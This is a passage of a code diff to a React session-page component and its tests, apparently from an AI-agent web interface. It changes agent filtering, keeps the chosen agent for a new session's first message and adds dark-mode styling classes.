+    expect(screen.getByTestId('session-chat')).toHaveAttribute('data-process-groups-default-open', 'true');
+  });
+
   it('syncs selected session when query param changes after mount', async () => {
     const user = userEvent.setup();
 
@@ -445,6 +473,17 @@ describe('SessionPage session actions menu', () => {
           skills: [],
           tools: [],
         },
+        {
+          name: 'oracle',
+          description: 'Oracle',
+          mode: 'subagent',
+          native: true,
+          delegatable: false,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
       ],
       loading: false,
       error: null,
@@ -459,6 +498,7 @@ describe('SessionPage session actions menu', () => {
 
     expect(screen.getByRole('button', { name: /Explore/i })).toBeInTheDocument();
     expect(screen.queryByRole('button', { name: /hidden-system/i })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: /Oracle/i })).not.toBeInTheDocument();
   });
 
   it('resets the chat agent to Rex when creating a new session', async () => {
@@ -629,7 +669,7 @@ describe('SessionPage session actions menu', () => {
     });
   });
 
-  it('uses Rex for the first message when an empty session is created by sending', async () => {
+  it('uses the selected agent for the first message when an empty session is created by sending', async () => {
     const user = userEvent.setup();
     useAgents.mockReturnValue({
       agents: [
@@ -668,9 +708,9 @@ describe('SessionPage session actions menu', () => {
     await waitFor(() => {
       expect(client.post).toHaveBeenCalledWith(
         '/api/session/session-2/prompt_async',
-        expect.objectContaining({ agent: 'rex' }),
+        expect.objectContaining({ agent: 'explore' }),
       );
     });
-    expect(screen.getByRole('button', { name: /Rex/i })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Explore/i })).toBeInTheDocument();
   });
 });
diff --git a/webui/src/pages/Session/index.tsx b/webui/src/pages/Session/index.tsx
index b577b5063..0c1a731a7 100644
--- a/webui/src/pages/Session/index.tsx
+++ b/webui/src/pages/Session/index.tsx
@@ -21,7 +21,7 @@ import client from '@/api/client';
 import { defaultModelAPI, modelV2API } from '@/api/provider';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import { buildPromptParts, type ImagePartData } from '@/utils/imageUpload';
-import { getAgentDisplayDescription, getAgentDisplayName } from '@/utils/agentDisplay';
+import { getAgentDisplayDescription, getAgentDisplayName, isAgentUsableInChat } from '@/utils/agentDisplay';
 import { formatSessionDate } from '@/utils/time';
 import type { ModelDefinitionV2 } from '@/types';
 
@@ -122,9 +122,9 @@ export default function SessionPage() {
   const { sessions, loading: loadingSessions, refetch: refetchSessions, updateSessionTitle, removeSession, removeSessions, addSession } = useSessions();
   const { agents, loading: loadingAgents } = useAgents();
   const { providers, loading: loadingProviders } = useProviders();
-  const primaryAgents = useMemo(() => agents.filter((a) => a.mode === 'primary'), [agents]);
+  const primaryAgents = useMemo(() => agents.filter((a) => a.mode === 'primary' && isAgentUsableInChat(a)), [agents]);
   const subAgents = useMemo(
-    () => agents.filter((a) => a.mode !== 'primary' && !(a.tags ?? []).includes('system')),
+    () => agents.filter((a) => a.mode !== 'primary' && isAgentUsableInChat(a)),
     [agents],
   );
   const chatAgents = useMemo(() => [...primaryAgents, ...subAgents], [primaryAgents, subAgents]);
@@ -497,14 +497,13 @@ export default function SessionPage() {
       const newSessionId = response.data.id;
 
       addSession(response.data);
-      setSelectedAgent('rex');
       setSelectedModelKey(null);
       setSelectedSessionId(newSessionId);
 
       const payload: Record<string, unknown> = {
         parts: buildPromptParts(text, imageParts),
       };
-      const effectiveAgent = agentOverride || 'rex';
+      const effectiveAgent = agentOverride || selectedAgent || 'rex';
       if (effectiveAgent) payload.agent = effectiveAgent;
       if (modelOverride) payload.model = modelOverride;
       client.post(`/api/session/${newSessionId}/prompt_async`, payload).catch((err: any) => {
@@ -513,7 +512,7 @@ export default function SessionPage() {
     } catch (err: any) {
       toast.error(t('createFailed'), err.message);
     }
-  }, [addSession, toast, t]);
+  }, [addSession, selectedAgent, toast, t]);
 
   const showSelectorTooltip = useCallback((target: HTMLElement, title: string, lines: string[]) => {
     const rect = target.getBoundingClientRect();
@@ -693,10 +692,10 @@ export default function SessionPage() {
   }
 
   return (
-    <div className="h-full w-full flex overflow-hidden">
+    <div className="h-full w-full flex overflow-hidden bg-gray-50 dark:bg-zinc-950">
       {/* ── Sidebar ── */}
       <div
-        className={`bg-white border-r border-gray-100 flex flex-col transition-all duration-300 flex-shrink-0 h-full overflow-hidden ${
+        className={`bg-white border-r border-gray-100 flex flex-col transition-all duration-300 flex-shrink-0 h-full overflow-hidden dark:border-zinc-800 dark:bg-zinc-950 ${
           sidebarCollapsed ? 'w-0' : 'w-64'
         }`}
       >
@@ -709,7 +708,7 @@ export default function SessionPage() {
             <button
               onClick={handleCreateSession}
               disabled={creating}
-              className="w-full pl-8 pr-3 py-2 text-left bg-white border border-gray-200 text-gray-700 rounded-lg hover:bg-gray-50 hover:border-gray-300 shadow-sm hover:shadow transition-all disabled:opacity-60 disabled:cursor-not-allowed text-sm font-medium"
+              className="w-full pl-8 pr-3 py-2 text-left bg-white border border-gray-200 text-gray-700 rounded-lg hover:bg-gray-50 hover:border-gray-300 shadow-sm hover:shadow transition-all disabled:opacity-60 disabled:cursor-not-allowed text-sm font-medium dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:border-zinc-700 dark:hover:bg-zinc-800"
             >
               {t('newSession')}
             </button>
@@ -720,7 +719,7 @@ export default function SessionPage() {
               value={searchQuery}
               onChange={(e) => setSearchQuery(e.target.value)}
               placeholder={t('filterConversations', 'Filter conversations...')}
-              className="w-full pl-8 pr-3 py-1.5 text-sm bg-gray-100 rounded-lg border-0 outline-none focus:bg-gray-200 transition-colors placeholder:text-gray-400 text-gray-700"
+              className="w-full pl-8 pr-3 py-1.5 text-sm bg-gray-100 rounded-lg border-0 outline-none focus:bg-gray-200 transition-colors placeholder:text-gray-400 text-gray-700 dark:bg-zinc-900 dark:text-zinc-200 dark:placeholder:text-zinc-600 dark:focus:bg-zinc-800"
             />
           </div>
         </div>
@@ -748,7 +747,7 @@ export default function SessionPage() {
 
               return (
               <div key={key}>
-                <div className="px-4 pt-4 pb-1 text-xs font-semibold text-gray-400 uppercase tracking-wide select-none">
+                <div className="px-4 pt-4 pb-1 text-xs font-semibold text-gray-400 uppercase tracking-wide select-none dark:text-zinc-600">
                   {t(labelKey, labelKey)}
                 </div>
                 {visibleItems.map((session) => (
@@ -757,10 +756,10 @@ export default function SessionPage() {
                     onClick={() => selectMode ? handleToggleCheck(session.id) : setSelectedSessionId(session.id)}
                     className={`group relative mx-2 mb-1 px-3 py-2.5 rounded-xl border cursor-pointer transition-all duration-150 ${
                       !selectMode && selectedSessionId === session.id
-                        ? 'bg-gray-100 border-gray-300 shadow-sm'
+                        ? 'bg-gray-100 border-gray-300 shadow-sm dark:border-zinc-700 dark:bg-zinc-900 dark:shadow-none'
                         : selectMode && checkedIds.has(session.id)
-                        ? 'bg-blue-50 border-blue-200'
-                        : 'border-gray-100 hover:border-gray-200 hover:bg-gray-50 hover:shadow-sm'
+                        ? 'bg-blue-50 border-blue-200 dark:border-blue-500/40 dark:bg-blue-950/30'
+                        : 'border-gray-100 hover:border-gray-200 hover:bg-gray-50 hover:shadow-sm dark:border-transparent dark:hover:border-zinc-800 dark:hover:bg-zinc-900 dark:hover:shadow-none'
                     }`}
                   >
                     {/* Title row */}
@@ -797,12 +796,12 @@ export default function SessionPage() {
                           }}
                           placeholder={t('renamePlaceholder')}
                           disabled={renameSubmitting}
-                          className="w-full min-w-0 rounded border border-blue-300 bg-white px-1.5 py-0.5 text-sm text-gray-900 outline-none focus:border-blue-400"
+                          className="w-full min-w-0 rounded border border-blue-300 bg-white px-1.5 py-0.5 text-sm text-gray-900 outline-none focus:border-blue-400 dark:border-blue-500/50 dark:bg-zinc-950 dark:text-zinc-100"
                           aria-label={t('rename')}
                           data-session-rename-input
                         />
                       ) : (
-                        <h3 className="font-semibold text-gray-900 truncate text-sm flex items-center gap-1.5">
+                        <h3 className="font-semibold text-gray-900 truncate text-sm flex items-center gap-1.5 dark:text-zinc-100">
                           <span className="truncate">{session.title}</span>
                           {session.isShared && (
                             <span className="inline-flex items-center rounded-full border border-blue-200 bg-blue-50 px-1.5 py-0.5 text-[10px] font-medium text-blue-700">
@@ -814,7 +813,7 @@ export default function SessionPage() {
                     </div>
                     {/* Timestamp row */}
                     {session.time?.updated && renamingSessionId !== session.id && (
-                      <p className="mt-1 text-xs text-gray-400 truncate pl-0.5">
+                      <p className="mt-1 text-xs text-gray-400 truncate pl-0.5 dark:text-zinc-500">
                         {formatSessionDate(session.time.updated)}
                       </p>
                     )}
@@ -837,8 +836,8 @@ export default function SessionPage() {
                           title={t('moreActions')}
                           aria-label={t('moreActions')}
                           aria-expanded={openMenuSessionId === session.id}
-                          className={`p-1 rounded text-gray-400 hover:text-gray-600 hover:bg-gray-200 transition-all ${
-                            openMenuSessionId === session.id ? 'opacity-100 text-gray-600 bg-gray-200' : 'opacity-0 group-hover:opacity-100'
+                          className={`p-1 rounded text-gray-400 hover:text-gray-600 hover:bg-gray-200 transition-all dark:text-zinc-500 dark:hover:bg-zinc-800 dark:hover:text-zinc-200 ${
+                            openMenuSessionId === session.id ? 'opacity-100 text-gray-600 bg-gray-200 dark:bg-zinc-800 dark:text-zinc-200' : 'opacity-0 group-hover:opacity-100'
                           }`}
                         >
                           <MoreHorizontal className="w-3.5 h-3.5" />
@@ -874,7 +873,7 @@ export default function SessionPage() {
 
         {/* Bottom：批量操作栏 / 批量选择入口 */}
         {sessions.length > 0 && (
-          <div className="border-t border-gray-100 px-3 pt-3 pb-4 flex-shrink-0">
+          <div className="border-t border-gray-100 px-3 pt-3 pb-4 flex-shrink-0 dark:border-zinc-800">
             {selectMode ? (
               <div className="grid grid-cols-3 gap-1.5">
                 <button
@@ -914,11 +913,11 @@ export default function SessionPage() {
       {/* ── Main area ── */}
       <div className="flex-1 flex flex-col overflow-hidden h-full min-w-0">
         {/* Header */}
-        <div className="px-6 h-12 border-b border-gray-200 bg-white flex items-center justify-between flex-shrink-0 relative">
+        <div className="px-6 h-12 border-b border-gray-200 bg-white flex items-center justify-between flex-shrink-0 relative dark:border-zinc-800 dark:bg-zinc-950/95">
           <div className="absolute left-4 top-1/2 -translate-y-1/2">
             <button
               onClick={() => setSidebarCollapsed(!sidebarCollapsed)}
-              className="p-2 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 shadow-sm hover:shadow-md transition-all duration-200"
+              className="p-2 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 shadow-sm hover:shadow-md transition-all duration-200 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:shadow-none"
               title={sidebarCollapsed ? t('showHistory') : t('hideHistory')}
             >
               {sidebarCollapsed ? <PanelLeft className="w-5 h-5" /> : <PanelLeftClose className="w-5 h-5" />}
@@ -926,7 +925,7 @@ export default function SessionPage() {
           </div>
 
           <div className="flex items-center gap-3 ml-14">
-            <h2 className="text-base font-semibold text-gray-900">
+            <h2 className="text-base font-semibold text-gray-900 dark:text-zinc-100">
               {selectedSession?.title || t('newSession')}
             </h2>
           </div>
@@ -939,7 +938,13 @@ export default function SessionPage() {
           sessionId={selectedSessionId}
           live={Boolean(selectedSessionId)}
           hideInput={selectedSession?.canWrite === false}
-          display={{ compact: false, showActions: true, showTimestamp: true }}
+          display={{
+            compact: false,
+            showActions: true,
+            showTimestamp: true,
+            collapseIntermediateSteps: true,
+            processGroupsDefaultOpen: true,
+          }}
           agentName={selectedAgent}
           mentionAgents={chatAgents}
           className="flex-1 min-h-0"
@@ -962,7 +967,7 @@ export default function SessionPage() {
               <button
                 type="button"
                 onClick={() => setShowAgentOptions(!showAgentOptions)}
-                className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900"
+                className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                 title={t('agentPicker.title')}
               >
                 <Bot className="h-3 w-3 shrink-0" />
@@ -972,12 +977,12 @@ export default function SessionPage() {
                 <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${showAgentOptions ? 'rotate-180' : ''}`} />
               </button>
               {showAgentOptions && (
-                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm">
-                  <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5">
+                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+                  <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
                     <div className="min-w-0">
-                      <div className="text-xs font-semibold text-zinc-700">{t('agentPicker.title')}</div>
+                      <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('agentPicker.title')}</div>
                       <div
-                        className="truncate text-[10px] text-zinc-400"
+                        className="truncate text-[10px] text-zinc-400 dark:text-zinc-500"
                         onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
                         onMouseEnter={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
                         onMouseOver={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
@@ -987,7 +992,7 @@ export default function SessionPage() {
                         {t('agentPicker.hint')}
                       </div>
                     </div>
-                    <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px]">
+                    <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px] dark:border-zinc-800 dark:bg-zinc-950">
                       {(['all', 'builtin', 'custom'] as AgentSourceFilter[]).map((filter) => (
                         <button
                           key={filter}
@@ -995,8 +1000,8 @@ export default function SessionPage() {
                           onClick={() => setAgentSourceFilter(filter)}
                           className={`rounded px-1.5 py-0.5 transition-colors ${
                             agentSourceFilter === filter
-                              ? 'bg-zinc-100 text-zinc-900'
-                              : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800'
+                              ? 'bg-zinc-100 text-zinc-900 dark:bg-zinc-800 dark:text-zinc-50'
+                              : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
                           }`}
                         >
                           {t(`agentPicker.filter.${filter}`)}
@@ -1017,21 +1022,21 @@ export default function SessionPage() {
                           onClick={() => { setSelectedAgent(agent.name); setShowAgentOptions(false); }}
                           className={`w-full min-w-0 rounded-md px-2 py-1.5 text-left transition-colors ${
                             selectedAgent === agent.name
-                              ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa]'
-                              : 'hover:bg-zinc-50 text-zinc-700'
+                              ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                              : 'hover:bg-zinc-50 text-zinc-700 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
                           }`}
                         >
                           <div className="flex min-w-0 items-center gap-2">
-                            <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600' : 'text-zinc-400'}`} />
-                            <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900">
+                            <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                            <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">
                               {displayName}
                             </span>
                             <span className={`shrink-0 rounded px-1.5 py-0.5 text-[9px] font-medium ${
                               agent.mode === 'primary'
-                                ? 'bg-zinc-100 text-zinc-600'
+                                ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
                                 : agent.native
-                                  ? 'bg-zinc-100 text-zinc-600'
-                                  : 'bg-teal-50 text-teal-600'
+                                  ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
+                                  : 'bg-teal-50 text-teal-600 dark:bg-teal-950/40 dark:text-teal-300'
                             }`}>
                               {agent.mode === 'primary'
                                 ? t('agentPicker.badge.primary')
@@ -1042,7 +1047,7 @@ export default function SessionPage() {
                             <div className="ml-auto flex shrink-0 items-center gap-1">
                               {primaryDesc && (
                                 <span
-                                  className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200"
+                                  className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
                                   onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                   onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                   onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, displayName, [primaryDesc])}
@@ -1051,7 +1056,7 @@ export default function SessionPage() {
                                   onMouseLeave={() => setSelectorTooltip(null)}
                                   onPointerLeave={() => setSelectorTooltip(null)}
                                 >
-                                  <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500" />
+                                  <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
                                 </span>
                               )}
                             </div>
@@ -1073,7 +1078,7 @@ export default function SessionPage() {
                 type="button"
                 onClick={() => setShowModelOptions(!showModelOptions)}
                 disabled={loadingProviders || loadingEnabledModels || chatModelOptions.length === 0}
-                className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50"
+                className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                 title={selectedModelOption ? `${selectedModelOption.providerName} / ${selectedModelOption.modelID}` : t('modelPicker.empty')}
               >
                 <Cpu className="h-3 w-3 shrink-0" />
@@ -1083,10 +1088,10 @@ export default function SessionPage() {
                 <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${showModelOptions ? 'rotate-180' : ''}`} />
               </button>
               {showModelOptions && (
-                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm">
-                  <div className="border-b border-zinc-100 px-2.5 py-1.5">
-                    <div className="text-xs font-semibold text-zinc-700">{t('modelPicker.title')}</div>
-                    <div className="truncate text-[10px] text-zinc-400">{t('modelPicker.hint')}</div>
+                <div className="absolute right-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+                  <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+                    <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('modelPicker.title')}</div>
+                    <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">{t('modelPicker.hint')}</div>
                   </div>
                   <div className="h-[13.5rem] overflow-y-auto p-1.5">
                     {loadingProviders || loadingEnabledModels ? (
@@ -1094,9 +1099,9 @@ export default function SessionPage() {
                     ) : groupedChatModelOptions.length > 0 ? (
                       groupedChatModelOptions.map((group) => (
                         <div key={group.providerID} className="py-1 first:pt-0 last:pb-0">
-                          <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur">
+                          <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur dark:bg-zinc-900/95 dark:text-zinc-400">
                             <span className="truncate">{group.providerName}</span>
-                            <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500">
+                            <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500 dark:bg-zinc-800 dark:text-zinc-400">
                               {t('modelPicker.count', { count: group.models.length })}
                             </span>
                           </div>
@@ -1108,21 +1113,21 @@ export default function SessionPage() {
                                 onClick={() => void handleSelectModel(option)}
                                 className={`w-full rounded-md px-2 py-1.5 text-left transition-colors ${
                                   selectedModelOption?.key === option.key
-                                    ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa]'
-                                    : 'text-zinc-700 hover:bg-zinc-50'
+                                    ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                                    : 'text-zinc-700 hover:bg-zinc-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
                                 }`}
                               >
                                 <div className="flex min-w-0 items-center gap-2">
-                                  <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600' : 'text-zinc-400'}`} />
-                                  <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900">{option.label}</span>
+                                  <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                                  <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">{option.label}</span>
                                   {option.supportsVision === true && (
-                                    <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600">
+                                    <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300">
                                       {t('modelPicker.vision')}
                                     </span>
                                   )}
                                   <div className="ml-auto flex shrink-0 items-center gap-1">
                                     <span
-                                      className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200"
+                                      className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
                                       onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                       onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                       onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
@@ -1131,7 +1136,7 @@ export default function SessionPage() {
                                       onMouseLeave={() => setSelectorTooltip(null)}
                                       onPointerLeave={() => setSelectorTooltip(null)}
                                     >
-                                      <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500" />
+                                      <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
                                     </span>
                                   </div>
                                 </div>
@@ -1144,7 +1149,7 @@ export default function SessionPage() {
                       <div className="p-3 text-center text-xs text-zinc-500">{t('modelPicker.empty')}</div>
                     )}
                   </div>
-                  <div className="border-t border-zinc-100 p-1.5">
+                  <div className="border-t border-zinc-100 p-1.5 dark:border-zinc-800">
                     <button
                       type="button"
                       onClick={() => {
@@ -1152,7 +1157,7 @@ export default function SessionPage() {
                         setSelectorTooltip(null);
                         navigate('/models');
                       }}
-                      className="flex w-full items-center justify-center gap-1.5 rounded-md px-2 py-1.5 text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-50 hover:text-zinc-900"
+                      className="flex w-full items-center justify-center gap-1.5 rounded-md px-2 py-1.5 text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-50 hover:text-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
                     >
                       <Plus className="h-3 w-3" />
                       {t('modelPicker.addModel')}
@@ -1167,16 +1172,16 @@ export default function SessionPage() {
 
       {selectorTooltip && (
         <div
-          className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md"
+          className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:shadow-xl dark:shadow-black/30"
           style={{ left: selectorTooltip.x, top: selectorTooltip.y }}
         >
-          <div className="mb-0.5 font-semibold text-zinc-800">{selectorTooltip.title}</div>
+          <div className="mb-0.5 font-semibold text-zinc-800 dark:text-zinc-100">{selectorTooltip.title}</div>
           {selectorTooltip.lines.map((line, index) => (
-            <div key={`${selectorTooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500'}>
+            <div key={`${selectorTooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500 dark:text-zinc-400'}>
               {line}
             </div>
           ))}
-          <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200" />
+          <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200 dark:border-l-zinc-800" />
         </div>
       )}
 
@@ -1187,14 +1192,14 @@ export default function SessionPage() {
         if (!session) return null;
         return (
           <div
-            className="fixed z-50 w-36 overflow-hidden rounded-lg border border-gray-200 bg-white py-1 shadow-lg"
+            className="fixed z-50 w-36 overflow-hidden rounded-lg border border-gray-200 bg-white py-1 shadow-lg dark:border-zinc-800 dark:bg-zinc-900"
             style={{ top: menuAnchor.top, right: menuAnchor.right }}
             data-session-menu-portal
             onClick={(e) => e.stopPropagation()}
           >
             <button
               onClick={(e) => { e.stopPropagation(); handleStartRename(session.id, session.title); setOpenMenuSessionId(null); setMenuAnchor(null); }}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <PencilLine className="w-3.5 h-3.5" />
               <span>{t('rename')}</span>
@@ -1202,7 +1207,7 @@ export default function SessionPage() {
             <button
               onClick={(e) => { e.stopPropagation(); void handleDownloadSession(session.id, session.title); setOpenMenuSessionId(null); setMenuAnchor(null); }}
               disabled={downloadingSessionId === session.id}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <Download className="w-3.5 h-3.5" />
               <span>{t('downloadJson')}</span>
@@ -1210,16 +1215,16 @@ export default function SessionPage() {
             <button
               onClick={(e) => { e.stopPropagation(); setOpenMenuSessionId(null); setMenuAnchor(null); void handleShareSession(session.id, !session.isShared); }}
               disabled={session.canWrite === false}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <Share2 className="w-3.5 h-3.5" />
               <span>{session.isShared ? t('unshareAction') : t('shareAction')}</span>
             </button>
-            <div className="mx-2.5 my-1 border-t border-gray-100" />
+            <div className="mx-2.5 my-1 border-t border-gray-100 dark:border-zinc-800" />
             <button
               onClick={(e) => { e.stopPropagation(); setOpenMenuSessionId(null); setMenuAnchor(null); void handleDeleteSession(session.id); }}
               disabled={session.canDelete === false}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-red-600 hover:bg-red-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-red-600 hover:bg-red-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-red-300 dark:hover:bg-red-950/40"
             >
               <Trash2 className="w-3.5 h-3.5" />
               <span>{t('deleteAction')}</span>
@@ -1240,30 +1245,30 @@ function WelcomeScreen({ onSuggestion }: { onSuggestion: (text: string) => void
       <div className="w-20 h-20 mx-auto mb-6 rounded-full bg-gradient-to-br from-slate-700 to-slate-900 flex items-center justify-center shadow-lg">
         <Sparkles className="w-10 h-10 text-white" />
       </div>
-      <h3 className="text-xl font-bold text-gray-900 mb-3">{t('welcome.title')}</h3>
-      <p className="text-sm text-gray-600 mb-8">{t('welcome.description')}</p>
+      <h3 className="text-xl font-bold text-gray-900 mb-3 dark:text-zinc-50">{t('welcome.title')}</h3>
+      <p className="text-sm text-gray-600 mb-8 dark:text-zinc-400">{t('welcome.description')}</p>
 
       <div className="flex flex-wrap gap-3 justify-center">
         <button
           onClick={() => onSuggestion(t('welcome.alertTriageSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-slate-400 hover:bg-slate-50 transition-all duration-200 shadow-sm hover:shadow-md"
